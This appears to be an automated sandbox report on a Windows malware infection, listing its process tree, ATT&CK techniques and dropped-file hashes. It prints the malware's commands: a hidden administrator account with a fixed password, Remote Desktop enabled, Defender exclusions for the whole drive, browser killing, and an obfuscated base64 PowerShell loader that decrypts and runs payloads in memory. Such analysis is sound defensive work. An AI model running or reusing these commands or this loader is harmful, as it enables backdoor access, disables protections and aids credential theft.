C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5256,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5288,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5636,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5636,i,13528338284424512995,7380733963777317563,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:85⤵
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"4⤵
- Enumerates processes with tasklist
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416090101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10416090101\PQPYAYJJ.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SYSTEM32\net.exenet user "SystemUsersAdm" "1234567X!" /add /y7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "SystemUsersAdm" "1234567X!" /add /y8⤵
-
-
-
C:\Windows\SYSTEM32\net.exenet localgroup "Administrators" "SystemUsersAdm" /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "SystemUsersAdm" /add8⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC USERACCOUNT WHERE "Name = 'SystemUsersAdm'" SET PasswordExpires=FALSE7⤵
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC USERACCOUNT WHERE "Name = 'SystemUsersAdm'" SET Passwordchangeable=FALSE7⤵
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SYSTEM32\sc.exesc config termservice start= auto7⤵
- Launches sc.exe
-
-
C:\Windows\SYSTEM32\net.exenet start termservice7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start termservice8⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10416111121\5ym0ZYg.cmd"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10416111121\5ym0ZYg.cmd"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416120101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10416120101\TbV75ZR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 2485⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416130101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10416130101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416140101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10416140101\p3hx1_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416150101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10416150101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10416160101\f17f894f1e.exe"C:\Users\Admin\AppData\Local\Temp\10416160101\f17f894f1e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10416170101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10416170101\YGYZCmt.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3216 -ip 32161⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
7Disable or Modify System Firewall
1Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Process Discovery
1Query Registry
9System Information Discovery
6System Location Discovery
1System Language Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD55b8fb06983be9063ef128fa5aee80b3a
SHA1c065a0ee84eb1fd646ea213bca20543306d7c9e1
SHA256ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e
SHA512868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
649B
MD523680fea67756bdeeef8fb85d425dc91
SHA1ddf2d56cfda047681c57cce289ff7568b98551e0
SHA256177e1de93f0dc84f4acdae3abdabfd0c12aa842b9de18e21d29da032876b9dfd
SHA512e474604fe2263dd70b38601b9f538313020d2e67ee49c9c6b7640fc2f5ddd25e697da10ff6b00d0f7d687d0d335e2eb5565382ab1fba5aaac13700ad367b9c3d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD52fd0cffe41806d95578eb47ee61580f3
SHA112fc4fb36550350ab5cb4c4ee8e6054957fc2e61
SHA2568252551ee5f66952b8e867d74d2299c78214a37727a1b71527e084a9fe48774b
SHA5124aee6a5e41aaa896ab0d5aeb3af13322e4b7e43eef0592277dea710bd7b41b97100f43bde24271d039a2a2e1a96776f8ff8c38aad8b130b6d1f7b4b260d5c08d
-
Filesize
10KB
MD572c5200b0f562cc770812996e01345c4
SHA1d36017e25c6c22be413db4e3707e4e1b5f23e1f4
SHA2561b67f287696d28a8ce384e8e180130c8a69f7e65834f3008abb7d7029465abc1
SHA512f2f418d025268e1f07a999890f106a1cd559de70f6ba82e5f7a6bb129c665bdeeae1695c869efc30eb6df03d2a7e123c6323a4309bc5f21b7ea380df2ce2d026
-
Filesize
13KB
MD542ac73b2a61e180093bb26a9ca74dc29
SHA1d8547d575292300898cb8cfb6c3a30adc938dbc9
SHA2567f285f70c8f7106f32376770a7a2fff760f147bfdadf084c4d2763572f44b4d3
SHA5120a490299079893fd94eaa230fccc2b3764c9f343897c77c9bcde387402e2ea25417a03ebd63275ca20908ea3a30159b58d143abfb45347612e4370bd77cc1c98
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
81KB
MD5d14561822a277f82cbaead492cd866e5
SHA169cadb871193f8ec1ce2271dcea4cd31a7b5f707
SHA256d51507cbf403d443927ba18b6a6abc4b120ca92bfdd16c7b9139d62d7c72d774
SHA512296b81f2dbd0b9b9216c25d6ee5cdc5f1a5738e5dcf2ccea7939b2a9dbbaf9e8f3dd677ba6179bc4abcede8f8b3b404a5d3fc0b419d403878e618b56aad8110b
-
Filesize
82KB
MD58aedfa65a7699a52ae867ce1d5505c07
SHA1ce761372b097363fd4c704f67509a0a97816ad89
SHA25605e80c75b7659ae27a8ba9ae918b0fdd1031ac3ccf883cdfee77bf5103ba2c21
SHA512da61d1c823f4e4cdf914a8eae025aaaf5d914c5c14f7657d4d7b62cc108612417b1ba22c6a3a04e76d978f878489ebacaf3f9baeda4bb5a13eb573c8cfdb8b61
-
Filesize
80KB
MD56c1307448e8797be2bd2855356cd4ce6
SHA1844b1fd897e0914c925fc6e65737d3b2e6909938
SHA2561835723bdb6455dc3e399adf19959895ef8d099bfba77114890882d9f4c068f5
SHA5121be2409171717f36556c1061935ccb8c455952018d6a18c6d89fa948b844b2cc414202fed51351989591aca1a44ecbd508b10c164ea3931c4ccc47becb79394f
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
